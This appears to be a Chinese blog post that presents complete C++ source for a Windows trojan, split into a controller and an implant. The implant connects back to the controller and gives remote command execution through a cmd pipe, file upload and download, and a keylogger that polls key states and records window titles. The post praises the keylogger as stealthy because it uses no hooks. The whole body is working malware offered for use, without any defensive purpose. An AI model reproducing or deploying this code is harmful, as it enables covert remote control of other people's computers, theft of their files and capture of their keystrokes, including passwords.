【网络编程】Trojan源码 文件传输+远程cmd+键盘记录

Trojan可以实现三个功能，分别为文件传输，远程执行cmd，键盘记录。其中键盘记录功能没有利用hook函数，有较强的隐蔽性。

现在给出源码：

client:

// client.cpp : 定义控制台应用程序的入口点。//#include "stdafx.h"  #include <winsock2.h>  #include <cstdio>#include <wincrypt.h>#include <cstring>#include <iostream>  #include <string.h> #include<vector>#include<time.h>#define PORT 2345#define BUFFER_SIZE 1024#pragma comment(lib, "user32.lib")#pragma comment(lib, "shlwapi.lib")#pragma comment(lib, "ws2_32.lib")   #pragma comment(lib, "crypt32.lib")  using namespace std;unsigned char mac_mine[6] = { 0x40, 0xe2, 0x30, 0x68, 0x43, 0xa9 };//我的mac地址 40-E2-30-68-43-A9unsigned char ip_mine[16] = {"127.0.0.1" };//我的ip  172.20.10.5int num;struct node{sockaddr_in addrClient;SOCKET socketClient;}host[1024];//检测是否有新的主机连接DWORD WINAPI ClientThread(LPVOID lpParameter){int len = sizeof(SOCKADDR);SOCKET socketClient;sockaddr_in addrClient;int id = 0;SOCKET socketSever = (SOCKET)lpParameter;while (true){socketClient = accept(socketSever, (SOCKADDR *)&addrClient, &len);num++;host[num].addrClient=addrClient;host[num].socketClient = socketClient;}}//将断开连接的主机删除void RemoveHost(int id){for (int i = id; i < num; i++){host[i] = host[i + 1];}num--;}//检查是否有主机断开连接void HostClear(){for (int i = num; i >=1; i--){int sendbuf = 0;int Result=send(host[i].socketClient, (char*)&sendbuf, sizeof(int), 0);if (Result == SOCKET_ERROR){RemoveHost(i);}}}//刷新void refresh(){HostClear();cout << "受控主机数：" << num << endl;for (int i = 1; i <= num; i++){cout << i << ".   ip:" << inet_ntoa(host[i].addrClient.sin_addr) << "   port:" << host[i].addrClient.sin_port << endl;}}int recvn(SOCKET s, char * recvbuf, unsigned int fixedlen){int iResult;int cnt = fixedlen; //剩余多少字节尚未接收 while (cnt > 0){iResult = recv(s, recvbuf, cnt, 0);if (iResult < 0){printf("error: %d\n", WSAGetLastError());return -1;}if (iResult == 0)//对方关闭连接，返回已接收到的小于fixedlen的字节数 return fixedlen - cnt;recvbuf += iResult;cnt -= iResult;}return fixedlen;}//远程执行cmdvoid UseCmd(int id){SOCKET s = host[id].socketClient;charbuf[BUFFER_SIZE];char result[BUFFER_SIZE * 64];int  inputlen;getchar();while (1){memset(buf, 0, sizeof(buf));memset(result, 0, sizeof(result));cout << "C:\\Socket\\Client>";cin.getline(buf, sizeof(buf)); send(s, buf, BUFFER_SIZE, 0);if (buf[0] == 'e'&&buf[1] == 'x'&&buf[2] == 'i'&&buf[3] == 't'){cout << "The End." << endl;return ;}recvn(s, result, sizeof(result));printf(result);}}void GetFile(int id){SOCKET s = host[id].socketClient;char filename[BUFFER_SIZE];memset(filename, 0, sizeof(filename));cout << "输入文件名：";getchar();cin.getline(filename, sizeof(filename));send(s, filename, sizeof(filename), 0); TCHAR name[BUFFER_SIZE];memset(name, 0, sizeof(name));for (int i = 0; filename[i]; i++){name[i] = filename[i];}HANDLE hFile;DWORD count;hFile = CreateFile(name, // 文件名GENERIC_WRITE,          // 写入权限0,                      // 阻止其他进程访问NULL,                   // 子进程不可继承本句柄CREATE_ALWAYS,             // 仅不存在时创建新文件FILE_ATTRIBUTE_NORMAL,  // 普通文件NULL);unsigned int filelen;recvn(s, (char *)&filelen, sizeof(unsigned int));filelen = ntohl(filelen);unsigned int recvbuflen = min(filelen, BUFFER_SIZE);char recvbuf[BUFFER_SIZE];while (filelen > 0){cout << filelen << endl;memset(recvbuf, 0, sizeof(recvbuf));unsigned int recvlen=recvn(s, recvbuf, recvbuflen);WriteFile(hFile, recvbuf, recvlen, &count, 0);filelen -= recvlen;recvbuflen = min(filelen, recvbuflen); }CloseHandle(hFile);cout << "文件接收成功！" << endl;}void SendFile(int id){SOCKET  s = host[id].socketClient;char filename[BUFFER_SIZE];memset(filename, 0, sizeof(filename));cout << "输入文件名：";getchar();cin.getline(filename, sizeof(filename));send(s, filename, BUFFER_SIZE, 0);TCHAR name[BUFFER_SIZE];memset(name, 0, sizeof(name));for (int i = 0; filename[i]; i++){name[i] = filename[i];}HANDLE hFile;hFile = CreateFile(name,GENERIC_READ,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);DWORD dwBytesRead, dwBytesToRead;unsigned int filelen = GetFileSize(hFile, NULL);unsigned int filelen1 = htonl(filelen);send(s, (char*)&filelen1, sizeof(unsigned int), 0);char buf[BUFFER_SIZE*32];dwBytesToRead = filelen;dwBytesRead = 0;while (dwBytesToRead > 0){cout << dwBytesToRead << endl;memset(buf, 0, sizeof(buf));ReadFile(hFile, buf, 1024, &dwBytesRead, NULL);if (dwBytesRead == 0)break;dwBytesToRead -= dwBytesRead;send(s, buf, dwBytesRead, 0);}CloseHandle(hFile);cout << "文件传输成功！" << endl;}void KeyLogger(int id){SOCKET  s = host[id].socketClient;cout << "请输入记录时长：";int Time;cin >> Time;send(s, (char*)&Time, sizeof(int), 0);char filename[BUFFER_SIZE] = "KeyLogger.txt";TCHAR name[BUFFER_SIZE];for (int i = 0;i<BUFFER_SIZE; i++)name[i] = filename[i];HANDLE hFile;DWORD count;hFile = CreateFile(name, // 文件名GENERIC_WRITE,          // 写入权限0,                      // 阻止其他进程访问NULL,                   // 子进程不可继承本句柄CREATE_ALWAYS,             // 仅不存在时创建新文件FILE_ATTRIBUTE_NORMAL,  // 普通文件NULL);unsigned int filelen;recvn(s, (char *)&filelen, sizeof(unsigned int));filelen = ntohl(filelen);unsigned int recvbuflen = min(filelen, BUFFER_SIZE);char recvbuf[BUFFER_SIZE];cout << endl;while (filelen > 0){cout << filelen << " ";memset(recvbuf, 0, sizeof(recvbuf));unsigned int recvlen = recvn(s, recvbuf, recvbuflen);cout << recvlen << endl;WriteFile(hFile, recvbuf, recvlen, &count, 0);filelen -= recvlen;recvbuflen = min(filelen, recvbuflen);}CloseHandle(hFile);cout << "文件接收成功！" << endl;}int _tmain(int argc, _TCHAR* argv[]){WORD sockVersion = MAKEWORD(2, 2);WSADATA wsaData;int error = WSAStartup(sockVersion, &wsaData);if (error != 0){cout << "fail to startup! " << WSAGetLastError() << endl;return 0;}SOCKET socketSever = socket(AF_INET, SOCK_STREAM, 0);if (socketSever == INVALID_SOCKET){cout << "socket error! " << WSAGetLastError() << endl;WSACleanup();closesocket(socketSever);return 0;}//本机socket 地址sockaddr_in addrServer;addrServer.sin_addr.S_un.S_addr = htonl(INADDR_ANY);addrServer.sin_family = AF_INET;addrServer.sin_port = htons(PORT);//将socket绑定在本地端口if (bind(socketSever, (SOCKADDR*)&addrServer, sizeof(SOCKADDR)) == SOCKET_ERROR){cout << "bind error! " << WSAGetLastError() << endl;;closesocket(socketSever);WSACleanup();return 0;}if (listen(socketSever, 10) == SOCKET_ERROR)cout << "Listen failed with error " << WSAGetLastError() << endl;num = 0;HANDLE hThread = NULL;hThread = CreateThread(NULL, 0, ClientThread, (LPVOID)socketSever, 0, NULL);refresh();while (1){cout << "请选择操作" << endl;cout << "---------------------------------------------------"<<endl;cout << "|                    请输入选项                   |" << endl;cout << "|                    0.刷新主机                   |" << endl;cout << "|                    1.获取文件                   |" << endl;cout << "|                    2.发送文件                   |" << endl;cout << "|                    3.远程控制                   |" << endl;cout << "|                    4.键盘记录                   |" << endl;cout << "---------------------------------------------------" << endl;int choice;cin >> choice;if (choice == 0){refresh();}else{cout << "选择受控主机编号： ";int id;cin >> id;send(host[id].socketClient, (char*)&choice, sizeof(int), 0);if (choice == 1){GetFile(id);}if (choice == 2){SendFile(id);}if (choice == 3){UseCmd(id);}if (choice == 4){KeyLogger(id);}}}CloseHandle(hThread);closesocket(socketSever);return 0;}

server：

// server.cpp : 定义控制台应用程序的入口点。//#include "stdafx.h"  #include <winsock2.h>  #include <cstdio>#include <wincrypt.h>#include <time.h>#include <cstring>#include <iostream>  #include <string.h> #define PORT 2345#define BUFFER_SIZE 1024#pragma comment(lib, "user32.lib")#pragma comment(lib, "shlwapi.lib")#pragma comment(lib, "ws2_32.lib")   #pragma comment(lib, "crypt32.lib")  using namespace std;char IP[16] = { "127.0.0.1" };char *LowerCase[] = {"b","e","[ESC]","[F1]","[F2]","[F3]","[F4]","[F5]","[F6]","[F7]","[F8]","[F9]","[F10]","[F11]","[F12]","`","1","2","3","4","5","6","7","8","9","0","-","=","[TAB]","q","w","e","r","t","y","u","i","o","p","[","]","a","s","d","f","g","h","j","k","l",";","'","z","x","c","v","b","n","m",",",".","/","\\","[CTRL]","[WIN]"," ","[WIN]","[Print Screen]","[Scroll Lock]","[Insert]","[Home]","[PageUp]","[Del]","[End]","[PageDown]","[Left]","[UP]","[Right]","[Down]","[Num Lock]","/","*","-","+","0","1","2","3","4","5","6","7","8","9",".",};// Upper Case Key & Some Other Keyschar *UpperCase[] = {"b","e","[ESC]","[F1]","[F2]","[F3]","[F4]","[F5]","[F6]","[F7]","[F8]","[F9]","[F10]","[F11]","[F12]","~","!","@","#","$","%","^","&","*","(",")","_","+","[TAB]","Q","W","E","R","T","Y","U","I","O","P","{","}","A","S","D","F","G","H","J","K","L",":","\"","Z","X","C","V","B","N","M","<",">",".?","│","[CTRL]","[WIN]"," ","[WIN]","[Print Screen]","[Scroll Lock]","[Insert]","[Home]","[PageUp]","[Del]","[End]","[PageDown]","[Left]","[Up]","[Right]","[Down]","[Num Lock]","/","*","-","+","0","1","2","3","4","5","6","7","8","9",".",};// Ascii Keys,Forget About Itint SpecialKeys[] = {8,13,27,112,113,114,115,116,117,118,119,120,121,122,123,192,49,50,51,52,53,54,55,56,57,48,189,187,9,81,87,69,82,84,89,85,73,79,80,219,221,65,83,68,70,71,72,74,75,76,186,222,90,88,67,86,66,78,77,188,190,191,220,17,91,32,92,44,145,45,36,33,46,35,34,37,38,39,40,144,111,106,109,107,96,97,98,99,100,101,102,103,104,105,110,};HWND PreviousFocus = NULL;int recvn(SOCKET s, char * recvbuf, unsigned int fixedlen){int iResult;int cnt = fixedlen; //剩余多少字节尚未接收 while (cnt > 0){iResult = recv(s, recvbuf, cnt, 0);if (iResult < 0){printf("error: %d\n", WSAGetLastError());return -1;}if (iResult == 0)//对方关闭连接，返回已接收到的小于fixedlen的字节数 return fixedlen - cnt;recvbuf += iResult;cnt -= iResult;}return fixedlen;}void SendFile(SOCKET s){char filename[BUFFER_SIZE];memset(filename, 0, sizeof(filename));recvn(s, filename, BUFFER_SIZE); cout << filename << endl;TCHAR name[BUFFER_SIZE];memset(name, 0, sizeof(name));for (int i = 0; filename[i]; i++)name[i] = filename[i];HANDLE hFile;hFile = CreateFile(name,GENERIC_READ,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);DWORD dwBytesRead, dwBytesToRead;unsigned int filelen = GetFileSize(hFile, NULL);unsigned int filelen1 = htonl(filelen);send(s, (char*)&filelen1, sizeof(unsigned int), 0);char buf[BUFFER_SIZE * 32];dwBytesToRead = filelen;dwBytesRead = 0;while (dwBytesToRead > 0){cout << dwBytesToRead << endl;memset(buf, 0, sizeof(buf));ReadFile(hFile, buf, 1024, &dwBytesRead, NULL);if (dwBytesRead == 0)break;dwBytesToRead -= dwBytesRead;send(s, buf, dwBytesRead, 0); }CloseHandle(hFile);}void GetFile(SOCKET s){char filename[BUFFER_SIZE];memset(filename, 0, sizeof(filename));recvn(s, filename, BUFFER_SIZE);TCHAR name[BUFFER_SIZE];memset(name, 0, sizeof(name));for (int i = 0; filename[i]; i++){name[i] = filename[i];}HANDLE hFile;DWORD count;hFile = CreateFile(name, // 文件名GENERIC_WRITE,          // 写入权限0,                      // 阻止其他进程访问NULL,                   // 子进程不可继承本句柄CREATE_ALWAYS,             // 仅不存在时创建新文件FILE_ATTRIBUTE_NORMAL,  // 普通文件NULL);unsigned int filelen;recvn(s, (char *)&filelen, sizeof(unsigned int));filelen = ntohl(filelen);unsigned int recvbuflen = min(filelen, BUFFER_SIZE);char recvbuf[BUFFER_SIZE];while (filelen > 0){cout << filelen << endl;memset(recvbuf, 0, sizeof(recvbuf));unsigned int recvlen = recvn(s, recvbuf, recvbuflen);WriteFile(hFile, recvbuf, recvlen, &count, 0);filelen -= recvlen;recvbuflen = min(filelen, recvbuflen);}CloseHandle(hFile);cout << "文件接收成功！" << endl;}int execmd(char* cmd, char* result) {char buffer[BUFFER_SIZE];                         //定义缓冲区                        FILE* pipe = _popen(cmd, "r");            //打开管道，并执行命令 if (!pipe)return 0;                      //返回0表示运行失败 while (!feof(pipe)) {if (fgets(buffer, BUFFER_SIZE, pipe)){             //将管道输出到result中 strcat(result, buffer);}}_pclose(pipe);                            //关闭管道 return 1;                                 //返回1表示运行成功 }void UseCmd(SOCKET s){char buf[BUFFER_SIZE];char result[BUFFER_SIZE * 64]; while (1){memset(buf, 0, sizeof(buf));memset(result, 0, sizeof(result));recvn(s, buf, BUFFER_SIZE); if (buf[0] == 'e'&&buf[1] == 'x'&&buf[2] == 'i'&&buf[3] == 't'){return;}execmd(buf, result); send(s, result, sizeof(result),0);}}char *WindowCaption = (char*)malloc(sizeof(char)* (100 + 2)); // Allocate Memory For The CaptionBOOL IsWindowsFocusChange(){HWND hFocus = GetForegroundWindow(); // Retrieve The Active Windows's FocusBOOL ReturnFlag = FALSE; // Declare The Return Flagif (hFocus != PreviousFocus) // The Active Windows Has Change{PreviousFocus = hFocus; // Save The Old Active Windos Focusint WinLeng = GetWindowTextLength(hFocus); // Get The Active Windows's Caption's Lengthmemset(WindowCaption, 0, sizeof(WindowCaption));//char *WindowCaption = (char*)malloc(sizeof(char)* (WinLeng + 2)); // Allocate Memory For The Caption//char WindowCaption[52];GetWindowText(hFocus, (LPWSTR)WindowCaption, (WinLeng + 1)); // Retrieve The Active Windows's Captionif (WindowCaption != NULL&&strlen(WindowCaption) > 0) // Really Get The Windows's Caption{//printf("rnThe Active Windows Title: %srn", WindowCaption); // Display The Active Windows's CaptionReturnFlag = TRUE; // Indicate The Windows's Focus Has Changed}//free(WindowCaption); // Free The Allocated Memory} return ReturnFlag; // Return The Flag}// End Of IsWindowsFocusChange Function//-------------------------------------------------------------------------// Purpose: To Manage(Display)The Keys Retrieved From System's Key Buffer// Return Type: Boolean// Parameters: NULL//-------------------------------------------------------------------------BOOL KeyLogger(int Time){Time *= 125;int bKstate[256] = { 0 }; // Declare The Key State Arrayint i, x;char KeyBuffer[600]; // Key Buffer Arrayint state; // Variable To Hode State Of Some Special Key Like CapsLock,Shift And ectint shift; // Variable To Hode State Of Shift Key// Reset The Buffermemset(KeyBuffer, 0, sizeof(KeyBuffer));char filename[1024] = { "out.txt" };TCHAR name[1024];for (int i = 0; i < 1024; i++)name[i] = filename[i];HANDLE hFile;DWORD count;hFile = CreateFile(name, // 文件名GENERIC_WRITE,          // 写入权限0,                      // 阻止其他进程访问NULL,                   // 子进程不可继承本句柄CREATE_ALWAYS,             // 仅不存在时创建新文件FILE_ATTRIBUTE_NORMAL,  // 普通文件NULL);DWORD cnt;while (Time--) // Forever Loop Is Taking Place Here{Sleep(8); // Rest For A While,And Avoid Taking 100% CPU Usage.Pretty Important To Add This Line Or The System Gets Fucked UPif (IsWindowsFocusChange()) //Check The Active Windows Title{if (strlen(KeyBuffer) != 0) // Keys Are Pressed{//printf("%s", KeyBuffer); // Display The Keys PressedWriteFile(hFile, KeyBuffer, 600, &cnt, 0);memset(KeyBuffer, 0, sizeof(KeyBuffer)); // reset The Buffer}}for (i = 0; i<92; i++) // Looping To Check Visual Keys{shift = GetKeyState(VK_SHIFT); // Check Whether Shift Is Pressedx = SpecialKeys[i]; // Match The Keyif (GetAsyncKeyState(x) & 0x8000) // Check Combination Keys{// See Whether CapsLocak Or Shift Is Pressedif (((GetKeyState(VK_CAPITAL) != 0) && (shift > -1) && (x > 64) && (x < 91))) //Caps Lock And Shift Is Not Pressed{bKstate[x] = 1; //Uppercase Characters A-Z}elseif (((GetKeyState(VK_CAPITAL) != 0) && (shift < 0) && (x > 64) && (x < 91))) //Caps Lock And Shift Is Pressed{bKstate[x] = 2; //Lowercase a-z}elseif (shift < 0) // Shift Is Pressed{bKstate[x] = 3; //Uppercase Characters A-Z}elsebKstate[x] = 4; //Lowercase a-z}else{if (bKstate[x] != 0) // No Combination Keys Detected{state = bKstate[x]; // Retrieve The Current StatebKstate[x] = 0; // Reset The Current Stateif (x == 8) // Back Space Is Detected{KeyBuffer[strlen(KeyBuffer) - 1] = 0; // One Key Back Thencontinue; // Start A New Loop}elseif (strlen(KeyBuffer) > 550) // Buffer FULL{//printf("%s <Buffer Full>", KeyBuffer); // Display The Keys RetrievedWriteFile(hFile, KeyBuffer, 600, &cnt, 0);memset(KeyBuffer, 0, sizeof(KeyBuffer)); // Reset The Buffercontinue; // Start A New Loop}elseif (x == 13) // Enter Is Detected{if (strlen(KeyBuffer) == 0) // No Other Keys Retrieved But Enter{continue; // Start A New Loop}//printf("%s<Enter>", KeyBuffer); // Retrieve Other Keys With EnterWriteFile(hFile, KeyBuffer, 600, &cnt, 0);memset(KeyBuffer, 0, sizeof(KeyBuffer)); // Display The Keys With Entercontinue; // Start A New Loop}elseif ((state % 2) == 1) //Must Be Upper Case Characters{strcat(KeyBuffer, UpperCase[i]); // Store The Key To Key Buffer}elseif ((state % 2) == 0) // Must Be Lower Case Characters{strcat(KeyBuffer, LowerCase[i]); // Store The Key To Key Buffer}}}}// End Of For Loop}// End Of While LoopCloseHandle(hFile);return TRUE; // Return To The Caller}// End Of KeyLogger Function// End Of Filevoid UseKeyLogger(SOCKET s){int Time;recv(s, (char*)&Time, sizeof(int), 0);KeyLogger(Time);char filename[BUFFER_SIZE] = "out.txt";TCHAR name[BUFFER_SIZE];memset(name, 0, sizeof(name));for (int i = 0; filename[i]; i++)name[i] = filename[i];HANDLE hFile;hFile = CreateFile(name,GENERIC_READ,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);DWORD dwBytesRead, dwBytesToRead;unsigned int filelen = GetFileSize(hFile, NULL);unsigned int filelen1 = htonl(filelen);send(s, (char*)&filelen1, sizeof(unsigned int), 0);char buf[BUFFER_SIZE * 32];dwBytesToRead = filelen;dwBytesRead = 0;while (dwBytesToRead > 0){cout << dwBytesToRead << endl;memset(buf, 0, sizeof(buf));ReadFile(hFile, buf, 1024, &dwBytesRead, NULL);if (dwBytesRead == 0)break;dwBytesToRead -= dwBytesRead;send(s, buf, dwBytesRead, 0);}CloseHandle(hFile);}int _tmain(int argc, _TCHAR* argv[]){WORD sockVersion = MAKEWORD(2, 2);WSADATA wsaData;int error = WSAStartup(sockVersion, &wsaData);if (error){cout << "fail to startup" << GetLastError() << endl;WSACleanup();return -1;}SOCKET socketClient = socket(AF_INET, SOCK_STREAM, 0);if (socketClient == INVALID_SOCKET){cout << "socket error!  " << GetLastError() << endl;WSACleanup();closesocket(socketClient);return -1;}sockaddr_in addrServer;addrServer.sin_addr.S_un.S_addr = inet_addr(IP);addrServer.sin_family = AF_INET;addrServer.sin_port = htons(PORT);connect(socketClient, (SOCKADDR*)&addrServer, sizeof(SOCKADDR));int op;while (1){recvn(socketClient, (char*)&op, sizeof(int)); if (op == 1){SendFile(socketClient);}if (op == 2){GetFile(socketClient);}if (op == 3){UseCmd(socketClient);}if (op == 4){UseKeyLogger(socketClient);}}closesocket(socketClient);return 0;}